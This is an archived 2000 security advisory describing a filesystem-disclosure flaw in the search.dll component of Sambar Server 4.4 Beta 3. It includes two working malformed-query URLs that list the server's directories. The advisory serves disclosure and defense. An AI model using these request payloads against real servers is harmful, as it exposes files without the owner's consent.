sambar-http.txt

sambar-http.txt: Posted Sep 15, 2000; Authored by Dethy | Site synnergy.net; Sambar Server 4.4 Beta 3 and below for WinNT, Win95 OSR2, (possibly Linux affected) contains a vulnerability which allows remote users to browse the filesystem of the webserver. Fix available here.; tags | exploit, remote; systems | linux, windows; SHA-256 | 682efe87f41f4ff59f349e51db891761fcbe069277019c774fc845c93fc2a01d; Download | Favorite | View

sambar-http.txt


           ************************************************
           +    Sambar Server search CGI vulnerability    +
           ************************************************
           #               Advisory by dethy              #
           #               www.synnergy.net               #
           |==============================================|

                        Advisory # 13

Vulnerable:     Sambar Server 4.4 Beta 3 
Systems   :     WinNT, Win95 OSR2, (possibly Linux affected)
Product   :     http://www.sambar.com
Discovery :     dethy@synnergy.net


Discussion
-----------

The Sambar Server comes with a non-caching HTTP proxy server and basic SMTP, 
POP3, and IMAP4 proxy servers compiled in.
Sambar was created to test a three-tier communication infrastructure modeled 
after the Sybase Open Client/Open Server. Originally developed on a Sun 
Workstation (UNIX), it was ported to the PC (Windows 32) and licensed for 
commercial purposes.


Vulnerability
-------------

The vulnerability occurs in the search.dll Sambar ISAPI Search shipped with 
this product. This dynamic link loader does not check on the 'query' parameter
that is parsed to the server, therefore by constructing a malformed URL
we are able to view the contents of the server, all folders, and files.

Thanks also to USSR Labs (www.ussrback.com) for further testing.

Exploit
-------

All that is needed is a malformed query parameter parsed to the search.dll file.

http://server-running-sambar.com/search.dll?search?query=%00&logic=AND

.. this will reveal the current working directory contents.


 http://server-running-sambar.com/search.dll?search?query=/&logic=AND

.. this will reveal the root dir of the server.


Solution
--------

The vendor [ tod@sambar.com ] of Sambar Technologies has been contacted, so wait until a 
patched version comes out.


Disclaimer
----------

Synnergy Networks may not be held liable for the use and/or potential effects of these
programs or advisories, nor the content contained within. Use them at your own risk.


Contact
-------
E-Mail  : dethy@synnergy.net
Web     : http://www.synnergy.net

Top Authors In Last 30 Days

Red Hat 228 files
Ubuntu 55 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Google Security Research 6 files
Apple 6 files
Milad Karimi 5 files
Yevhenii Butenko 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,333)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,578)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,460)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

sambar-http.txt

sambar-http.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

sambar-http.txt

Share This

sambar-http.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems